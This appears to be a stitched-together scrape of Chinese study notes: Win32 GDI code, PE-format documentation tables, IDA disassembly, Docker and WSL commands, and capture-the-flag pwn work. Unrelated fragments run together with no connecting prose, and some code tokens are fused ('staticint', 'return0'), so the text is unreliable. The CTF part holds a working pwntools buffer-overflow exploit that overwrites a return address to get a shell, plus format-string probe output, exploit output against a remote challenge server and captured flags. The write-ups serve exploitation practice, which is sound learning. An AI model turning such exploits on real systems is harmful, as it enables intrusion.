typedefstructtagTEXTMETRICA { LONG tmHeight;//字体总高度 LONG tmAscent;//字体基线以上高度 LONG tmDescent;//字体基线以下高度 LONG tmInternalLeading;//字体重音符号高度 LONG tmExternalLeading;//行间距 LONG tmAveCharWidth;//消息字符加权宽度 LONG tmMaxCharWidth;//最宽字符宽度 LONG tmWeight;//字体粗细 LONG tmOverhang;//为字符串加粗或者斜体额外宽度 LONG tmDigitizedAspectX; LONG tmDigitizedAspectY; BYTE tmFirstChar;该字体第一个字符的编号 BYTE tmLastChar; BYTE tmDefaultChar; BYTE tmBreakChar; BYTE tmItalic; BYTE tmUnderlined; BYTE tmStruckOut; BYTE tmPitchAndFamily;//决定字体是否是等宽字体,最低位为1则变宽,为0则等宽 BYTE tmCharSet; } TEXTMETRICA,*PTEXTMETRICA,*NPTEXTMETRICA,*LPTEXTMETRICA;
case WM_LBUTTONDOWN: staticint cLBUTTONDOWN;//铁打的静态变量只会定义一次 ++cLBUTTONDOWN; TCHAR szBuffer[100];//流水的局部变量 wsprintf(szBuffer,TEXT("this is the %d time you click the left button"),cLBUTTONDOWN);//格式化字符串到szBuffer hdc = GetDC(hwnd); GetClientRect(hwnd, &rect); DrawText(hdc, szBuffer, -1, &rect, DT_SINGLELINE | DT_CENTER | DT_VCENTER); ReleaseDC(hwnd, hdc); return0;
每次按下鼠标左键都会更新cLBUTTONDOWN这个统计数字
显式多行
windows32编程上给出的例子是打印SystemMetrics所有的系统参数
效果如图
已经有一个窗口程序的雏形了
使用GetSystemMetrics获取系统参数
1 2 3
intGetSystemMetrics( [in] int nIndex );
该函数使用一个下标作为参数,意思是查询SystemMetrics表的第nIndex个元素
这个表啥样呢?
Value
Meaning
SM_ARRANGE56
The flags that specify how the system
arranged minimized windows. For more information, see the Remarks
section in this topic.
SM_CLEANBOOT67
The value that specifies how the system is
started:0 Normal boot1 Fail-safe boot2 Fail-safe with network bootA
fail-safe boot (also called SafeBoot, Safe Mode, or Clean Boot) bypasses
the user startup files.
SM_CMONITORS80
The number of display monitors on a
desktop. For more information, see the Remarks section in this
topic.
typedefstructtagSCROLLINFO {//SCROLLINFO结构体 UINT cbSize;//sizeof(SCROLLINFO) UINT fMask;//要设置或者获取的值 int nMin;//范围最小值 int nMax;//范围最大值 UINT nPage;//页面大小 int nPos;//当前位置 int nTrackPos;//当前追踪位置 } SCROLLINFO, *LPSCROLLINFO;
cout << "right!" << endl; cout << "flag:MRCTF{md5(" << final << ")}" << endl; cout << "md5()->{32/upper case/put the string into the function and transform into md5 hash}" << endl; system("pause");
┌──(root㉿Executor)-[/mnt/c/Users/86135/Desktop/MRCTF2020/EzCPP] └─# ./EasyCPP give me your key! 2345 1222 5774 2476 3374 9032 2456 3531 6720 right! flag:MRCTF{md5(234512225774247633749032245635316720)} md5()->{32/upper case/put the string into the function and transform into md5 hash} sh: 1: pause: not found
WARNING: No blkio throttle.read_bps_device support WARNING: No blkio throttle.write_bps_device support WARNING: No blkio throttle.read_iops_device support WARNING: No blkio throttle.write_iops_device support
docker镜像的使用
查找注册仓库中的镜像
1
docker search <镜像>
1 2 3 4 5 6 7
root@Executor:/home/docker# docker search httpd NAME DESCRIPTION STARS OFFICIAL AUTOMATED httpd The Apache HTTP Server Project 4090 [OK] centos/httpd-24-centos7 Platform for running Apache httpd 2.4 or bui… 44 centos/httpd 35 [OK] clearlinux/httpd httpd HyperText Transfer Protocol (HTTP) ser… 2 ...
其中STARS表明该镜像的权威性
OFFICIAL表明该镜像是否为官方镜像
从仓库拉取镜像
要私人定制一个花里胡哨的ubuntu镜像,首先得有一个干净的基础镜像
1
docker pull <仓库名>:<标签>
这里仓库名一般就是操作系统名比如ubuntu,标签就是操作系统版本比如20.04
因为docker仓库一般以操作系统命名,其中的镜像文件一般以对应操作系统版本号命名
1 2 3 4 5 6
root@Executor:~# docker pull ubuntu:20.04 20.04: Pulling from library/ubuntu d7bfe07ed847: Pull complete Digest: sha256:fd92c36d3cb9b1d027c4d2a72c6bf0125da82425fc2ca37c414d4f010180dc19 Status: Downloaded newer image for ubuntu:20.04 docker.io/library/ubuntu:20.04
查看本地镜像列表
1 2 3 4
root@Executor:~# docker images REPOSITORY TAG IMAGE ID CREATED SIZE ubuntu 20.04 20fffa419e3a 6 weeks ago 72.8MB ansible/ubuntu14.04-ansible latest 4621d4fe2959 6 years ago 461MB
栏目
意义
RESPOSITORY
镜像仓库源
TAG
镜像标签
IMAGE ID
镜像ID
CREATED
镜像创建时间
SIZE
镜像大小
可以使用仓库源:镜像标签来指定一个唯一的镜像,也可以直接使用镜像ID指定一个唯一的镜像
删除本地镜像
1
docker rmi <镜像>
这里镜像或者是仓库原:镜像标签指定,或者是镜像ID指定
甚至不用输全信息就可以指定唯一一个镜像
比如只输入镜像ID的前两位或者前三位
1 2 3 4 5 6 7 8 9 10
root@Executor:~# docker images REPOSITORY TAG IMAGE ID CREATED SIZE ubuntu 20.04 20fffa419e3a 6 weeks ago 72.8MB ubuntu 18.04 5a214d77f5d7 9 months ago 63.1MB ansible/ubuntu14.04-ansible latest 4621d4fe2959 6 years ago 461MB root@Executor:~# docker rmi 5a Untagged: ubuntu:18.04 Untagged: ubuntu@sha256:0fedbd5bd9fb72089c7bbca476949e10593cebed9b1fb9edf5b79dbbacddd7d6 Deleted: sha256:5a214d77f5d747e6ed81632310baa6190301feeb875cf6bf9da560108fa09972 Deleted: sha256:824bf068fd3dc3ad967022f187d85250eb052f61fe158486b2df4e002f6f984e
root@Executor:/home/docker# docker images REPOSITORY TAG IMAGE ID CREATED SIZE ssh/ubuntu latest 886ba4c00ba4 27 seconds ago 235MB ubuntu 20.04 20fffa419e3a 6 weeks ago 72.8MB
root@Executor:~# docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 49e5c3d8f7c6 ubuntu:20.04 "bash" About an hour ago Up 9 minutes lucid_ramanujan root@Executor:~# docker exec -it 49 bash root@49e5c3d8f7c6:/# exit exit root@Executor:~# docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 49e5c3d8f7c6 ubuntu:20.04 "bash" About an hour ago Up 9 minutes lucid_ramanujan
退出容器使用exit,或者ctrl+d
导出/导入容器
将容器导出成tar包
1
docker export <容器> > <位置>
比如将49e5c3d8f7c6这个容器(已安装ssh)导出到当前目录
1 2 3
root@Executor:/home/docker# docker export 49 > ssh-ubuntu.tar root@Executor:/home/docker# ls ssh-ubuntu.tar
将tar包导入成镜像(不能直接导入成容器)
1
docker import [OPTIONS] <tar包> <镜像>
将tar包导入为指定名称的镜像
1 2 3 4 5 6 7 8
root@Executor:/home/docker# ls ssh-ubuntu.tar root@Executor:/home/docker# docker import ssh-ubuntu.tar ssh/ubuntu sha256:725bf542d42fc0f7aad48f47ef2b81d1bcf7931bd1283a2b91ccbd3f8246e876 root@Executor:/home/docker# docker images REPOSITORY TAG IMAGE ID CREATED SIZE ssh/ubuntu latest 725bf542d42f 5 seconds ago 234MB ubuntu 20.04 20fffa419e3a 6 weeks ago 72.8MB
root@Executor:~# docker network ls NETWORK ID NAME DRIVER SCOPE 3ce19195196f bridge bridge local c1341214f1d0 host host local d4e52924ce6b none null local
cat > /etc/apt/sources.list << EOF deb http://mirrors.aliyun.com/debian/ stretch main non-free contrib deb-src http://mirrors.aliyun.com/debian/ stretch main non-free contrib deb http://mirrors.aliyun.com/debian-security stretch/updates main deb-src http://mirrors.aliyun.com/debian-security stretch/updates main deb http://mirrors.aliyun.com/debian/ stretch-updates main non-free contrib deb-src http://mirrors.aliyun.com/debian/ stretch-updates main non-free contrib deb http://mirrors.aliyun.com/debian/ stretch-backports main non-free contrib deb-src http://mirrors.aliyun.com/debian/ stretch-backports main non-free contrib EOF
docker run -dit -p 10011:80 apache/ubuntu:latest /bin/bash -c "/start.sh"
-d后台运行
-it启动交互终端
-p 10011:80,wsl的10011端口映射到容器的80端口
apache/ubuntu:latest我们自定义的镜像名
/bin/bash -c "/start.sh"命令行参数,启动后立刻自动执行
没有指定网络模式默认为桥接模式
没有指定端口上的传输层服务类型默认为TCP服务
1 2 3 4 5
root@Executor:~# docker run -dit -p 10011:80 apache/ubuntu /bin/bash -c "/start.sh" edc1b61f6c7a20ce4d85989ffa4c5042dc13769161f4d89952604a8496b869d1 root@Executor:~# docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES edc1b61f6c7a apache/ubuntu "docker-php-entrypoi…" 2 seconds ago Up 1 second 0.0.0.0:10011->80/tcp, :::10011->80/tcp friendly_northcutt
root@Executor:~# docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES edc1b61f6c7a apache/ubuntu "docker-php-entrypoi…" 12 minutes ago Up 11 minutes 0.0.0.0:10011->80/tcp, :::10011->80/tcp friendly_northcutt
deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ bionic-updates main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ bionic-proposed main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ bionic-backports main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ bionic-updates main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ bionic-proposed main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ bionic-backports main restricted universe multiverse
Justifies the text to the bottom of the
rectangle. This value is used only with the DT_SINGLELINE value.
DT_CALCRECT
Determines the width and height of the
rectangle. If there are multiple lines of text,
DrawText uses the width of the rectangle pointed to by
the lpRect parameter and extends the base of the rectangle to
bound the last line of text. If the largest word is wider than the
rectangle, the width is expanded. If the text is less than the width of
the rectangle, the width is reduced. If there is only one line of text,
DrawText modifies the right side of the rectangle so
that it bounds the last character in the line. In either case,
DrawText returns the height of the formatted text but
does not draw the text.
typedefstruct _IMAGE_FILE_HEADER { WORD Machine; WORD NumberOfSections; DWORD TimeDateStamp; DWORD PointerToSymbolTable; DWORD NumberOfSymbols; WORD SizeOfOptionalHeader; WORD Characteristics; } IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER;
Relocation information was stripped from
the file. The file must be loaded at its preferred base address. If the
base address is not available, the loader reports an error.
IMAGE_FILE_EXECUTABLE_IMAGE0x0002
The file is executable (there are no
unresolved external references).
IMAGE_FILE_LINE_NUMS_STRIPPED0x0004
COFF line numbers were stripped from the
file.
IMAGE_FILE_LOCAL_SYMS_STRIPPED0x0008
COFF symbol table entries were stripped
from file.
IMAGE_FILE_AGGRESIVE_WS_TRIM0x0010
Aggressively trim the working set. This
value is obsolete.
IMAGE_FILE_LARGE_ADDRESS_AWARE0x0020
The application can handle addresses
larger than 2 GB.
IMAGE_FILE_BYTES_REVERSED_LO0x0080
The bytes of the word are reversed. This
flag is obsolete.
IMAGE_FILE_32BIT_MACHINE0x0100
The computer supports 32-bit words.
IMAGE_FILE_DEBUG_STRIPPED0x0200
Debugging information was removed and
stored separately in another file.
IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP0x0400
If the image is on removable media, copy
it to and run it from the swap file.
IMAGE_FILE_NET_RUN_FROM_SWAP0x0800
If the image is on the network, copy it to
and run it from the swap file.
IMAGE_FILE_SYSTEM0x1000
The image is a system file.
IMAGE_FILE_DLL0x2000
The image is a DLL file. While it is an
executable file, it cannot be run directly.
IMAGE_FILE_UP_SYSTEM_ONLY0x4000
The file should be run only on a
uniprocessor computer.
IMAGE_FILE_BYTES_REVERSED_HI0x8000
The bytes of the word are reversed. This
flag is obsolete.
These tables were added to the image to support a uniform mechanism
for applications to delay the loading of a DLL until the first call into
that DLL. The layout of the tables matches that of the traditional
import tables that are described in section 6.4, The
.idata Section." Only a few details are discussed here.
.data:01008000 ; Section 2. (virtual address 00008000) .data:01008000 ; Virtual size : 00001BA8 ( 7080.) .data:01008000 ; Section size in file : 00000600 ( 1536.) .data:01008000 ; Offset to raw data for section: 00007200 .data:01008000 ; Flags C0000040: Data Readable Writable .data:01008000 ; Alignment : default .data:01008000 ; =========================================================================== .data:01008000 .data:01008000 ; Segment type: Pure data .data:01008000 ; Segment permissions: Read/Write .data:01008000 _data segment para public 'DATA' use32 .data:01008000 assume cs:_data .data:01008000 ;org 1008000h .data:01008000 ; BYTE Data .data:01008000 Data dd 78h ; DATA XREF: NPCommand(x,x,x)+4D6↑r .data:01008000 ; NPCommand(x,x,x)+569↑w ... .data:01008004 dword_1008004 dd 1 ; DATA XREF: CheckSave(x)+27↑r .data:01008004 ; CheckSave(x)+65↑r ... .data:01008008 ; WCHAR ClassName .data:01008008 ClassName: ; DATA XREF: sub_1004143+59↑o .data:01008008 ; NPInit(x,x,x,x)+10D↑o .data:01008008 text "UTF-16LE", 'Notepad',0 .data:01008018 ; int dword_1008018 .data:01008018 dword_1008018 dd 0FFFFFFFFh ; DATA XREF: NpSaveDialogHookProc(x,x,x,x)+94↑r .data:01008018 ; NpOpenDialogHookProc(x,x,x,x)+4F↑w ... ....
ida一开始给出的一块注释
1 2 3 4 5 6
.data:01008000 ; Section 2. (virtual address 00008000) .data:01008000 ; Virtual size : 00001BA8 ( 7080.) .data:01008000 ; Section size in file : 00000600 ( 1536.) .data:01008000 ; Offset to raw data for section: 00007200 .data:01008000 ; Flags C0000040: Data Readable Writable .data:01008000 ; Alignment : default
第二节(相对虚拟地址8000h)
虚拟内存中的大小1BA8h字节
磁盘文件中的大小600h字节
磁盘文件中本节的基地址7200h
标志:c0000040,数据段可读写,不可执行
对齐:默认
ImageBase
虚拟地址空间中进程的基地址,也就是PE头将会从0x1000000这个地址开始装载
这一点已经在前面的实验中多次证实了
微软给出的解释是:
The preferred address of the first byte of the image when it is
loaded in memory. This value is a multiple of 64K bytes. The default
value for DLLs is 0x10000000. The default value for applications is
0x00400000, except on Windows CE where it is 0x00010000.
Code integrity checks are forced. If you
set this flag and a section contains only uninitialized data, set the
PointerToRawData member of IMAGE_SECTION_HEADER
for that section to zero; otherwise, the image will fail to load because
the digital signature cannot be verified.
IMAGE_DLLCHARACTERISTICS_NX_COMPAT0x0100
The image is compatible with data
execution prevention (DEP).
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION0x0200
The image is isolation aware, but should
not be isolated.
IMAGE_DLLCHARACTERISTICS_NO_SEH0x0400
The image does not use structured
exception handling (SEH). No handlers can be called in this image.
The section should not be padded to the
next boundary. This flag is obsolete and is replaced by
IMAGE_SCN_ALIGN_1BYTES.
0x00000010
Reserved.
IMAGE_SCN_CNT_CODE0x00000020
The section contains executable code.
IMAGE_SCN_CNT_INITIALIZED_DATA0x00000040
The section contains initialized
data.
IMAGE_SCN_CNT_UNINITIALIZED_DATA0x00000080
The section contains uninitialized
data.
IMAGE_SCN_LNK_OTHER0x00000100
Reserved.
IMAGE_SCN_LNK_INFO0x00000200
The section contains comments or other
information. This is valid only for object files.
0x00000400
Reserved.
IMAGE_SCN_LNK_REMOVE0x00000800
The section will not become part of the
image. This is valid only for object files.
IMAGE_SCN_LNK_COMDAT0x00001000
The section contains COMDAT data. This is
valid only for object files.
0x00002000
Reserved.
IMAGE_SCN_NO_DEFER_SPEC_EXC0x00004000
Reset speculative exceptions handling bits
in the TLB entries for this section.
IMAGE_SCN_GPREL0x00008000
The section contains data referenced
through the global pointer.
0x00010000
Reserved.
IMAGE_SCN_MEM_PURGEABLE0x00020000
Reserved.
IMAGE_SCN_MEM_LOCKED0x00040000
Reserved.
IMAGE_SCN_MEM_PRELOAD0x00080000
Reserved.
IMAGE_SCN_ALIGN_1BYTES0x00100000
Align data on a 1-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_2BYTES0x00200000
Align data on a 2-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_4BYTES0x00300000
Align data on a 4-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_8BYTES0x00400000
Align data on a 8-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_16BYTES0x00500000
Align data on a 16-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_32BYTES0x00600000
Align data on a 32-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_64BYTES0x00700000
Align data on a 64-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_128BYTES0x00800000
Align data on a 128-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_256BYTES0x00900000
Align data on a 256-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_512BYTES0x00A00000
Align data on a 512-byte boundary. This is
valid only for object files.
IMAGE_SCN_ALIGN_1024BYTES0x00B00000
Align data on a 1024-byte boundary. This
is valid only for object files.
IMAGE_SCN_ALIGN_2048BYTES0x00C00000
Align data on a 2048-byte boundary. This
is valid only for object files.
IMAGE_SCN_ALIGN_4096BYTES0x00D00000
Align data on a 4096-byte boundary. This
is valid only for object files.
IMAGE_SCN_ALIGN_8192BYTES0x00E00000
Align data on a 8192-byte boundary. This
is valid only for object files.
IMAGE_SCN_LNK_NRELOC_OVFL0x01000000
The section contains extended relocations.
The count of relocations for the section exceeds the 16 bits that is
reserved for it in the section header. If the
NumberOfRelocations field in the section header is
0xffff, the actual relocation count is stored in the
VirtualAddress field of the first relocation. It is an
error if IMAGE_SCN_LNK_NRELOC_OVFL is set and there are fewer than
0xffff relocations in the section.
Called by the compiler when you have more than one page of local
variables in your function.
_chkstk Routine is a helper routine for the C compiler. For x86
compilers, _chkstk Routine is called when the local variables exceed 4K
bytes; for x64 compilers it is 8K.
Windows pages in extra stack for your thread as it is used. At the
end of the stack, there is one guard page mapped as inaccessible memory
-- if the program accesses it (because it is trying to use more stack
than is currently mapped), there's an access violation. The OS catches
the fault, maps in another page of stack at the same address as the old
guard page, creates a new guard page just beyond the old one, and
resumes from the instruction that caused the violation.
If a function has more than one page of local variables, then the
first address it accesses might be more than one page beyond the current
end of the stack. Hence it would miss the guard page and trigger an
access violation that the OS doesn't realise is because more stack is
needed. If the total stack required is particularly huge, it could
perhaps even reach beyond the guard page, beyond the end of the virtual
address space assigned to stack, and into memory that's actually in use
for something else.
So, _chkstk ensures that there is enough space for the
local variables. You can imagine that it does this by touching the
memory for the local variables at page-sized intervals, in increasing
order, to ensure that it doesn't miss the guard page (so-called "stack
probes"). I don't know whether it actually does that, though, possibly
it takes a more direct route and instructs the OS to map in a certain
amount of stack. Either way, if the total required is greater than the
virtual address space available for stack, then the OS can complain
about it instead of doing something undefined.
... -00000006 db ? ; undefined -00000005 db ? ; undefined -00000004 var_4 dd ? +00000000 s db 4 dup(?) +00000004 r db 4 dup(?) +00000008 +00000008 ; end of stack variables
NAME FRIENDLY NAME Ubuntu Ubuntu Debian Debian GNU/Linux kali-linux Kali Linux Rolling openSUSE-42 openSUSE Leap 42 SLES-12 SUSE Linux Enterprise Server v12 Ubuntu-16.04 Ubuntu 16.04 LTS Ubuntu-18.04 Ubuntu 18.04 LTS Ubuntu-20.04 Ubuntu 20.04 LTS
PS C:\Users\86135\Desktop\pwn> wsl -u root ┏━(Message from Kali developers) ┃ ┃ This is a minimal installation of Kali Linux, you likely ┃ want to install supplementary tools. Learn how: ┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/ ┃ ┗━(Run: “touch ~/.hushlogin” to hide this message) ┌──(root㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn] └─# exit logout PS C:\Users\86135\Desktop\pwn> wsl -u kali ┏━(Message from Kali developers) ┃ ┃ This is a minimal installation of Kali Linux, you likely ┃ want to install supplementary tools. Learn how: ┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/ ┃ ┗━(Run: “touch ~/.hushlogin” to hide this message)
PS C:\Users\86135\Desktop\pwn> kali config --default-user root PS C:\Users\86135\Desktop\pwn> kali ┏━(Message from Kali developers) ┃ ┃ This is a minimal installation of Kali Linux, you likely ┃ want to install supplementary tools. Learn how: ┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/ ┃ ┗━(Run: “touch ~/.hushlogin” to hide this message) ┌──(root㉿Executor)-[~] └─#
适用于 Linux 的 Windows 子系统最后更新于 2022/4/21 适用于 Linux 的 Windows 子系统内核可以使用“wsl --update”手动更新,但由于你的系统设置,无法进行自动更新。 若要接收自动内核更新,请启用 Windows 更新设置:“在更新 Windows 时接收其他 Microsoft 产品的更新”。 有关详细信息,请访问https://aka.ms/wsl2kernel。 Windows 更新已暂停。
┌──(root㉿Executor)-[~] └─# ipconfig -bash: ipconfig: command not found
┌──(root㉿Executor)-[~] └─# ipconfig.exe
Windows IP 配置
以太网适配器 以太网:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接 ...
也可以用wsl打开主系统中已经添加到环境变量的窗口应用程序
也可以在wsl上调用主系统的cmd,切换到主系统的cmd终端
1 2 3 4 5 6 7 8 9
┌──(root㉿Executor)-[~] └─# cmd.exe '\\wsl.localhost\kali-linux\root' 用作为当前目录的以上路径启动了 CMD.EXE。 UNC 路径不受支持。默认值设为 Windows 目录。 Microsoft Windows [版本 10.0.22000.675] (c) Microsoft Corporation。保留所有权利。
PS C:\Users\86135\Desktop\pwn> wsl ls -l total 108 drwxrwxrwx 1 kali kali 4096 Jun 2 19:52 CGfsb drwxrwxrwx 1 kali kali 4096 May 19 23:14 cgpwn drwxrwxrwx 1 kali kali 4096 Jun 20 09:55 dice_game drwxrwxrwx 1 kali kali 4096 Jun 19 23:09 forgot drwxrwxrwx 1 kali kali 4096 May 11 17:45 get_shell drwxrwxrwx 1 kali kali 4096 May 20 09:28 guess_num drwxrwxrwx 1 kali kali 4096 May 11 09:51 hello_pwn drwxrwxrwx 1 kali kali 4096 May 20 08:45 int_overflow drwxrwxrwx 1 kali kali 4096 May 11 17:38 level0 drwxrwxrwx 1 kali kali 4096 May 11 21:08 level2 drwxrwxrwx 1 kali kali 4096 Jun 3 16:27 level3 drwxrwxrwx 1 kali kali 4096 Jun 21 10:30 mytest -rwxrwxrwx 1 kali kali 84286 Jun 3 16:10 pwn.md drwxrwxrwx 1 kali kali 4096 Jun 19 23:38 reactor drwxrwxrwx 1 kali kali 4096 Jun 20 00:28 realtime drwxrwxrwx 1 kali kali 4096 Jun 20 10:06 stack2 drwxrwxrwx 1 kali kali 4096 Jun 3 10:56 string drwxrwxrwx 1 kali kali 4096 May 29 16:03 testPIE
# Settings apply across all Linux distros running on WSL 2 [wsl2] #正文第一行必须是[wsl2]这种标记
# Limits VM memory to use no more than 4 GB, this can be set as whole numbers using GB or MB memory=4GB #限制内存最大4G # Sets the VM to use two virtual processors processors=8#设置8个处理器
┌──(root㉿Executor)-[/home] └─# cat /etc/resolv.conf # This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf: # [network] # generateResolvConf = false nameserver 172.25.144.1
┌──(root㉿Executor)-[/home/dustball/kernelROP/mydev] └─# uname -a Linux Executor 5.8.13-dustland #1 SMP Sun Mar 24 13:56:15 CST 2024 x86_64 GNU/Linux
指定kernel位置
比如在windows的~/.wslconfig中这样写
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
# Settings apply across all Linux distros running on WSL 2 [wsl2] kernel=C:\\opt\\kernel # Limits VM memory to use no more than 4 GB, this can be set as whole numbers using GB or MB memory=4GB #限制内存最大4G
# Sets the VM to use two virtual processors processors=8 #设置8个处理器
-00000074 v2 db 32 dup(?) -00000054 v3 db 40 dup(?) -0000002C s db 32 dup(?) ; string(C) -0000000C v5 dd ? -00000008 i dd ? -00000004 var_4 dd ? +00000000 s db 4 dup(?) +00000004 r db 4 dup(?) +00000008 +00000008 ; end of stack variables
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/forgot] └─$ python3 exp.py [+] Opening connection to 111.200.241.244 on port 51086: Done /mnt/c/Users/86135/Desktop/pwn/forgot/exp.py:23: BytesWarning: Text isnotbytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes sh.sendline('vader') [*] Switching to interactive mode I should give you a pointer perhaps. Here: 8048654
Enter the string to be validate > cyberpeace{4edfc4922cff2900b97255284e605051} [*] Got EOF while reading in interactive
错误想法
错误1
在循环伊始
1 2 3 4 5 6
for ( i = 0; ; ++i ) { v0 = i; if ( v0 >= strlen(v2) ) break; ....
-0000000000000200 v5 db 512 dup(?) +0000000000000000 s db 8 dup(?) +0000000000000008 r db 8 dup(?) +0000000000000010 +0000000000000010 ; end of stack variables
前512+8=520个字节随便溢出
后面八个字节溢出成shell函数的地址0x4005F6
属实有点儿弱智了
1 2 3 4 5 6 7 8 9 10 11
from pwn import *
sh=process('./reactor')
sh.recv()
payload=(520*'a').encode()+p64(0x4005f6);
sh.sendline(payload)
sh.interactive()
1 2 3 4 5 6
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/reactor] └─$ python3 exp.py [+] Starting local process './reactor': pid 44 [*] Switching to interactive mode $ whoami kali
cyberpeace{a6053fab9ffe26d2ddc53ce7f78e08be}
实时数据监测
1 2 3 4 5 6 7 8 9
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/realtime] └─$ checksec realtime [*] '/mnt/c/Users/86135/Desktop/pwn/realtime/realtime' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/realtime] └─$ python3 exp.py [+] Starting local process './realtime': pid 77 [*] Switching to interactive mode [*] Process './realtime' stopped with exit code 0 (pid 77) AAAA-0xf7f5ace0-0xff8a6a84-(nil)-0x1-0x80483a0-0xff8a6a28-0x80484e7-0xff8a6820-0x200-0xf7f2b580-(nil)-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d The location of key is 0804a048, and its value is 00000000,not the 0x02223322. (╯°Д°)╯︵ ┻━┻ [*] Got EOF while reading in interactive